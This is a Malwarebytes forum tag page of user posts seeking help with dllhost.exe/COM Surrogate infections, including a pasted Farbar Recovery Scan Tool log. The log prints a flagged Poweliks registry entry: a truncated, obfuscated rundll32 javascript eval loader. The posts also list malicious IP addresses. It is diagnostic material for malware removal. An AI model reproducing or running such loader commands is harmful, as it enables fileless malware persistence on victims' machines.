Jump to content

Search the Community

Showing results for tags 'dllhost.exe'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Announcements
    • Malwarebytes News
    • Beta Testing Program
  • Malware Removal Help
    • Windows Malware Removal Help & Support
    • Mac Malware Removal Help & Support
    • Mobile Malware Removal Help & Support
    • Malware Removal Self-Help Guides
  • Malwarebytes for Home Support
    • Malwarebytes for Windows Support Forum
    • Malwarebytes for Mac Support Forum
    • Malwarebytes for Android Support Forum
    • Malwarebytes for iOS Support
    • Malwarebytes Privacy
    • Malwarebytes Browser Guard
    • False Positives
    • Comments and Suggestions
  • Malwarebytes for Business Support
    • Malwarebytes Endpoint Protection
    • Malwarebytes Incident Response (includes Breach Remediation)
    • Malwarebytes Endpoint Security
    • Malwarebytes Business Products Comments and Suggestions
  • Malwarebytes Tools and Other Products
    • Malwarebytes AdwCleaner
    • Malwarebytes Junkware Removal Tool Support
    • Malwarebytes Anti-Rootkit BETA Support
    • Malwarebytes Techbench USB (Legacy)
    • Malwarebytes Secure Backup discontinued
    • Other Tools
    • Malwarebytes Tools Comments and Suggestions
  • General Computer Help and Security Updates
    • BSOD, Crashes, Kernel Debugging
    • General Windows PC Help
  • Research Center
    • Newest Rogue-Ransomware Threats
    • Newest Malware Threats
    • Newest Mobile Threats
    • Newest IP or URL Threats
    • Newest Mac Threats
    • Report Scam Phone Numbers
  • General
    • General Chat
    • Forums Announcements & Feedback

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Location


Interests

  1. Hi, Recently I noticed multiple dllhost.exe COM surrogate files running in the taskbar that slowed my comp down dramtically (CPU Usage sometimes at >90%) and which could not be closed. I downloaded Malwarebytes which started blocking a sysWOW64\dllhost.exe process which alleviated some of the CPU usage, but was concerned when it showed a Tojan after running the scan. I'm seeking assistance with the best course of action with this as well getting those unncessary dllhost.exe files closed for good. This issue seems to be similiar to one experienced by user F127 if that helps. I attached the log of the scan, and opted to ignore the Trojan for now since I wasn't sure if I should wait to quarentine after receiving instruction from one of you. Your assistance would be extremely appreciated! Scan.txt
  2. Hi, Newbie here to anti-virus and malware that won't go away/doesn't have an update or scan that removes it. I have used a Windows PC for about 15 years now and have had occasional issues but been able to solve them using postings that have been from reliable sources. Yesterday I started getting CPU Usage Pop Ups (I use Norton for anti-virus; it came with the laptop otherwise would probably use Avast; laptop is an HP Pro Book 6406b; 32 bit; Windows 7 Professional; Intel i5-2520M; 2.50 GHz - sorry for all the data but not sure what you will need). The pop ups indicates high memory usage by COM Surrogate; another pop up said it was high memory usage by Internet Explorer; another said dllhost.exe; and another high processes for windows services. I have also been getting pop ups asking me if I want to debug whatever web page I am on (I have always answered No). (The CPU usage box requires no action when it pops up, just needs to be closed, its a Norton prompt.) I have also gotten a Norton message today that it blocked a Trojan attempt on three or four occasions from 195.2.240.80. I don't know what that sites is - Norton labeled the attempts "high" and indicates it blocked them. Norton also says it blocked an effort from 192.168.1.1 but labeled that "info" - this one happened about 15 times today according to Norton's history log. I have run Norton Full System Scan (takes an hour) and it found 16 "low risk" (per Norton) cookies however I always dump my explorer history before I run the scan and did so this time too, which means the cookies should have all been gone but were not this time. 15 minutes after the full scan ended, I ran it again, having had limited (if any) internet usage and it found another 14, also seen as "low risk" by Norton. Whatever this is seems to replicate. In Googling this topic, the solutions seem unique to each user and more than one site said to use a malware forum and speak with an expert. So here I am. However frustrating this is on my end, I want to say "thanks" in advance to whomever will be assisting me. I have a feeling this is not a "paying position" for you so I really appreciate the time you are taking to help. fyi; as I was typing just now, I just received a COM Surrogate pop up from Norton that it was using a ton of my memory. Thanks again. Mark
  3. I have a possible infection and would appreciate someone looking into this. My computer has very sluggish behavior and seems to take forever to do anything, even when nothing is running. I continually get error messages from Norton on high memory usage by Com Surrogates (Syswow 64) and I also have been getting notices from MalwareBytes on malicious websites being blocked (example attached.) I ran the Farbar recovery scan tool and found the following notation: ==================== Bamital & volsnap Check ================= (There is no automatic fix for files that do not pass verification.) ATTENTION: ====> ZeroAccess. Use DeleteJunctionsIndirectory: C:\Windows\system64 I am attaching the complete files for reference. Does this mean I have a rootkit and if so, how do I remove it? Thanks much in advance for your help. FRST.txt Addition.txt
  4. Hello, Just last night, I noticed my computer slowing down. When I opened task manager, I noticed my computer had a large amount of processes, mainly consisting of dllhost.exe processes that used up to 90% of my memory. I don't know what has caused this problem, but I do know this has occured to several other people, including on this forums. Since then I have ran a Malwarebytes threat scan, and the problem has became manageable, but not solved. I have already ran Farbar Recovery Scan Tool. I have also attached FRST.txt and Addition.txt Thanks for any help that comes my way. Addition.txt FRST.txt
  5. Working on a friends system which is infected. I installed MalwareBytes and ran several full scans. It found and cleaned up a number of things. However the realtime web protection is still popping up with multiple outgoing attempts. The process is: c:\windows\syswow64\dllhost.exe and the IP addresses include: 95.215.1.57 ; 31.184.192.90; 66.45.56.109 Here are the FarBar results, I will attach as files as well; I will leave the system alone for now. Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 16-10-2014 Ran by jalockma (administrator) on ACERLAPTOP on 17-10-2014 11:20:24 Running from C:\Users\jalockma\Desktop\Jbrown Recovery Loaded Profile: jalockma (Available profiles: jalockma) Platform: Windows 8 (X64) OS Language: English (United States) Internet Explorer Version 10 Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (APN LLC.) C:\Program Files (x86)\AskPartnerNetwork\Toolbar\apnmcp.exe (Qualcomm Atheros Commnucations) C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\AdminService.exe (Acer Incorporated) C:\Program Files (x86)\Acer\Acer Cloud\CCDMonitorService.exe (Microsoft Corporation) C:\Windows\System32\dasHost.exe (Dritek System Inc.) C:\Program Files (x86)\Launch Manager\dsiwmis.exe (ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDService.exe (Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe (McAfee, Inc.) C:\Program Files\Common Files\mcafee\mcsvchost\McSvHost.exe (McAfee, Inc.) C:\Windows\System32\mfevtps.exe (NTI Corporation) C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe (Dritek System INC.) C:\Windows\RfBtnSvc64.exe (McAfee, Inc.) C:\Program Files\mcafee\msc\McAPExe.exe (McAfee, Inc.) C:\Program Files\Common Files\mcafee\AMCore\mcshield.exe (McAfee, Inc.) C:\Program Files\Common Files\mcafee\systemcore\mfefire.exe (McAfee, Inc.) C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe (Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe (Realsil Microelectronics Inc.) C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe (McAfee, Inc.) C:\Program Files\mcafee\msm\McSmtFwk.exe (Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe (Microsoft Corporation) C:\Windows\System32\rundll32.exe (Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LMutilps32.exe (ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrl.exe (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe (Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LManager.exe (ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrlHelper.exe (McAfee, Inc.) C:\Program Files\Common Files\mcafee\Platform\McUICnt.exe (Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.0.1119.516_x64__8wekyb3d8bbwe\LiveComm.exe (Dritek System Inc.) C:\Program Files (x86)\Launch Manager\MMDx64Fx.exe (Intel Corporation) C:\Windows\System32\igfxext.exe (Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerTray.exe (Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerEvent.exe (CyberLink) C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe () C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuBrowserIEAgent.exe () C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuEmailOutlookAgent.exe (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe (Egis Technology Inc.) C:\Program Files\EgisTec IPS\PmmUpdate.exe (Egis Technology Inc.) C:\Program Files\EgisTec IPS\EgisUpdate.exe (Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe (McAfee, Inc.) C:\Program Files\mcafee\virusscan\McVsShld.exe (McAfee, Inc.) C:\Program Files\Common Files\mcafee\Platform\Core\mchost.exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [ETDCtrl] => C:\Program Files\Elantech\ETDCtrl.exe [2873744 2012-11-20] (ELAN Microelectronics Corp.) HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [12937872 2012-07-27] (Realtek Semiconductor) HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1214608 2012-07-10] (Realtek Semiconductor) HKLM\...\Run: [btPreLoad] => C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtPreLoad.exe [64640 2013-01-28] () HKLM-x32\...\Run: [mcui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [537992 2014-04-25] (McAfee, Inc.) HKLM-x32\...\Run: [LManager] => [X] HKLM-x32\...\Run: [Dolby Home Theater v4] => C:\Dolby PCEE4\pcee4.exe [508656 2012-07-25] (Dolby Laboratories Inc.) HKLM-x32\...\Run: [Norton Online Backup] => C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe [2994880 2012-08-15] (Symantec Corporation) HKLM-x32\...\Run: [bCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [91520 2010-03-13] (Microsoft Corporation) HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-05-11] (Adobe Systems Incorporated) HKLM-x32\...\Run: [mcpltui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [537992 2014-04-25] (McAfee, Inc.) HKLM-x32\...\Run: [sunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation) HKLM-x32\...\Run: [ApnTBMon] => C:\Program Files (x86)\AskPartnerNetwork\Toolbar\Updater\TBNotifier.exe [1942424 2014-09-22] (APN) HKLM-x32\...\Run: [LTCM Client] => C:\Program Files (x86)\LTCM Client\ltcmClient.exe [2756864 2011-04-07] (Leader Technologies Inc.) HKLM-x32\...\Run: [EEventManager] => C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe [1058880 2013-03-28] (SEIKO EPSON CORPORATION) Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation) HKLM\...\Policies\Explorer\Run: [btvStack] => C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exe [132736 2013-01-28] ( (Qualcomm Atheros Commnucations)) HKLM\...\Policies\Explorer: [NoFolderOptions] 0 HKLM\...\Policies\Explorer: [NoControlPanel] 0 HKU\S-1-5-19\...\RunOnce: [isMyWinLockerReboot] => msiexec.exe /qn /x{voidguid} HKU\S-1-5-20\...\RunOnce: [isMyWinLockerReboot] => msiexec.exe /qn /x{voidguid} HKU\S-1-5-21-2604008792-1424924497-987845697-1001\...\Run: [spotify Web Helper] => C:\Program Files (x86)\Spotify\Data\SpotifyWebHelper.exe [1193176 2013-01-26] () HKU\S-1-5-21-2604008792-1424924497-987845697-1001\...\Run: [EPLTarget\P0000000000000000] => C:\Windows\system32\spool\DRIVERS\x64\3\E_IATILBE.EXE [297024 2013-01-24] (SEIKO EPSON CORPORATION) HKU\S-1-5-21-2604008792-1424924497-987845697-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks! HKU\S-1-5-18\...\RunOnce: [isMyWinLockerReboot] => msiexec.exe /qn /x{voidguid} Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Acer Backup Manager Tray.lnk ShortcutTarget: Acer Backup Manager Tray.lnk -> C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe (NTI Corporation) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.8.130\SSScheduler.exe (McAfee, Inc.) Startup: C:\Users\jalockma\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2010 Screen Clipper and Launcher.lnk ShortcutTarget: OneNote 2010 Screen Clipper and Launcher.lnk -> C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEM.EXE (Microsoft Corporation) ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.com/ HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://acer13.msn.com HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank URLSearchHook: HKCU - McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll (McAfee, Inc.) URLSearchHook: HKCU - McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.) SearchScopes: HKLM - DefaultScope {27B34BBB-E4E0-4349-8F67-C6821D16BFBB} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MAARJS SearchScopes: HKLM - {27B34BBB-E4E0-4349-8F67-C6821D16BFBB} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MAARJS SearchScopes: HKLM-x32 - DefaultScope {27B34BBB-E4E0-4349-8F67-C6821D16BFBB} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MAARJS SearchScopes: HKLM-x32 - {27B34BBB-E4E0-4349-8F67-C6821D16BFBB} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MAARJS SearchScopes: HKCU - DefaultScope {27B34BBB-E4E0-4349-8F67-C6821D16BFBB} URL = SearchScopes: HKCU - {27B34BBB-E4E0-4349-8F67-C6821D16BFBB} URL = BHO: Ask Toolbar -> {4F524A2D-5637-006A-76A7-7A786E7484D7} -> C:\Program Files (x86)\AskPartnerNetwork\Toolbar\ORJ-V7\Passport_x64.dll (APN LLC.) BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation) BHO: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\IEPlugIn.dll (Qualcomm Atheros Commnucations) BHO: McAfee SiteAdvisor BHO -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll (McAfee, Inc.) BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation) BHO-x32: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.130\McAfeeMSS_IE.dll (McAfee, Inc.) BHO-x32: E-Web Print -> {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} -> C:\Program Files (x86)\Epson Software\E-Web Print\ewps_tb.dll (SEIKO EPSON CORPORATION) BHO-x32: Ask Toolbar -> {4F524A2D-5637-006A-76A7-7A786E7484D7} -> C:\Program Files (x86)\AskPartnerNetwork\Toolbar\ORJ-V7\Passport.dll (APN LLC.) BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation) BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation) BHO-x32: McAfee SiteAdvisor BHO -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.) BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation) BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation) Toolbar: HKLM - McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll (McAfee, Inc.) Toolbar: HKLM - Ask Toolbar - {4F524A2D-5637-006A-76A7-7A786E7484D7} - C:\Program Files (x86)\AskPartnerNetwork\Toolbar\ORJ-V7\Passport_x64.dll (APN LLC.) Toolbar: HKLM-x32 - McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.) Toolbar: HKLM-x32 - Ask Toolbar - {4F524A2D-5637-006A-76A7-7A786E7484D7} - C:\Program Files (x86)\AskPartnerNetwork\Toolbar\ORJ-V7\Passport.dll (APN LLC.) Toolbar: HKLM-x32 - E-Web Print - {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} - C:\Program Files (x86)\Epson Software\E-Web Print\ewps_tb.dll (SEIKO EPSON CORPORATION) Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll (McAfee, Inc.) Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll (McAfee, Inc.) Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.) Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.) Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\mcafee\msc\McSnIePl64.dll (McAfee, Inc.) Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\msc\McSnIePl.dll (McAfee, Inc.) FireFox: ======== FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL () FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.20513.0\npctrl.dll ( Microsoft Corporation) FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation) FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1205146.dll (Adobe Systems, Inc.) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation) FF Plugin-x32: @java.com/DTPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation) FF Plugin-x32: @mcafee.com/McAfeeMssPlugin -> C:\Program Files\McAfee Security Scan\3.8.130\npMcAfeeMss.dll (McAfee, Inc.) FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL () FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.20513.0\npctrl.dll ( Microsoft Corporation) FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation) FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\1\NP_wtapp.dll No File FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.) FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor FF Extension: McAfee SiteAdvisor - C:\Program Files (x86)\McAfee\SiteAdvisor [2012-12-20] FF HKLM-x32\...\Firefox\Extensions: [e-webprint@epson.com] - C:\Program Files (x86)\Epson Software\E-Web Print\Firefox Add-on FF Extension: E-Web Print - C:\Program Files (x86)\Epson Software\E-Web Print\Firefox Add-on [2014-04-30] FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK FF Extension: McAfee Anti-Spam Thunderbird Extension - C:\Program Files\McAfee\MSK [2012-12-20] Chrome: ======= CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2014-10-11] CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2014-10-11] ==================== Services (Whitelisted) ================= (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R2 APNMCP; C:\Program Files (x86)\AskPartnerNetwork\Toolbar\apnmcp.exe [166296 2014-09-22] (APN LLC.) R2 AtherosSvc; C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\adminservice.exe [227456 2013-01-28] (Qualcomm Atheros Commnucations) R2 CCDMonitorService; C:\Program Files (x86)\Acer\Acer Cloud\CCDMonitorService.exe [2449552 2012-10-26] (Acer Incorporated) S3 DeviceFastLaneService; C:\Program Files\Acer\Acer Device Fast-lane\DeviceFastLaneSvc.exe [469648 2012-11-16] (Acer Incorporated) R3 ePowerSvc; C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe [658064 2012-10-23] (Acer Incorporated) S3 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [144560 2012-05-17] (Seiko Epson Corporation) R2 ETDService; C:\Program Files\Elantech\ETDService.exe [100752 2012-11-20] (ELAN Microelectronics Corp.) R2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [328928 2013-07-30] (McAfee, Inc.) R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation) S3 KeyIso; C:\Windows\SysWOW64\keyiso.dll [43520 2012-07-25] (Microsoft Corporation) R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation) R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation) R2 McAfee SiteAdvisor Service; C:\Program Files\Common Files\McAfee\McSvcHost\McSvHost.exe [201304 2012-08-31] (McAfee, Inc.) R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [178528 2014-04-25] (McAfee, Inc.) S3 McAWFwk; c:\Program Files\mcafee\msc\McAWFwk.exe [332080 2012-01-26] (McAfee, Inc.) S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.130\McCHSvc.exe [288776 2013-09-06] (McAfee, Inc.) R2 McMPFSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [328928 2013-07-30] (McAfee, Inc.) R2 McNaiAnn; C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe [328928 2013-07-30] (McAfee, Inc.) S3 McODS; C:\Program Files\mcafee\VirusScan\mcods.exe [603424 2014-06-12] (McAfee, Inc.) S4 McOobeSv; C:\Program Files\Common Files\mcafee\McSvcHost\McSvHost.exe [201304 2012-08-31] (McAfee, Inc.) R2 mcpltsvc; C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe [328928 2013-07-30] (McAfee, Inc.) R2 McProxy; C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe [328928 2013-07-30] (McAfee, Inc.) R2 mfecore; C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe [1041192 2014-07-24] (McAfee, Inc.) R2 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [219752 2014-06-20] (McAfee, Inc.) R2 mfevtp; C:\windows\system32\mfevtps.exe [189912 2014-06-20] (McAfee, Inc.) R2 MSK80Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [328928 2013-07-30] (McAfee, Inc.) S3 Netlogon; C:\Windows\SysWOW64\netlogon.dll [634368 2012-07-25] (Microsoft Corporation) S3 NOBU; C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe [3943104 2012-08-15] (Symantec Corporation) R2 NTI IScheduleSvc; C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe [259136 2012-11-02] (NTI Corporation) R2 RfButtonDriverService; C:\Windows\RfBtnSvc64.exe [93296 2013-01-26] (Dritek System INC.) S3 StorSvc; C:\Windows\SysWOW64\storsvc.dll [18432 2012-07-25] (Microsoft Corporation) S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [16048 2013-07-01] (Microsoft Corporation) S3 GamesAppService; "C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe" [X] ==================== Drivers (Whitelisted) ==================== (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) S3 BTATH_LWFLT; C:\Windows\system32\DRIVERS\btath_lwflt.sys [77464 2013-01-28] (Qualcomm Atheros) S3 BthLEEnum; C:\Windows\system32\DRIVERS\BthLEEnum.sys [202752 2012-07-25] (Microsoft Corporation) R1 ccSet_NARA; C:\Windows\system32\drivers\NARAx64\0401000.00E\ccSetx64.sys [168608 2012-05-25] (Symantec Corporation) R3 cfwids; C:\Windows\System32\drivers\cfwids.sys [72128 2014-06-20] (McAfee, Inc.) S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [197704 2013-09-23] (McAfee, Inc.) R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-10-01] (Malwarebytes Corporation) R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-10-17] (Malwarebytes Corporation) R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2014-10-01] (Malwarebytes Corporation) R3 mfeapfk; C:\Windows\System32\drivers\mfeapfk.sys [181704 2014-06-20] (McAfee, Inc.) R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [313544 2014-06-20] (McAfee, Inc.) S0 mfeelamk; C:\Windows\System32\drivers\mfeelamk.sys [70600 2014-06-20] (McAfee, Inc.) R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [523792 2014-06-20] (McAfee, Inc.) R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [786296 2014-06-20] (McAfee, Inc.) R3 mfencbdc; C:\Windows\system32\DRIVERS\mfencbdc.sys [444720 2014-07-24] (McAfee, Inc.) S3 mfencrk; C:\Windows\system32\DRIVERS\mfencrk.sys [96592 2014-07-24] (McAfee, Inc.) R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [348552 2014-06-20] (McAfee, Inc.) R3 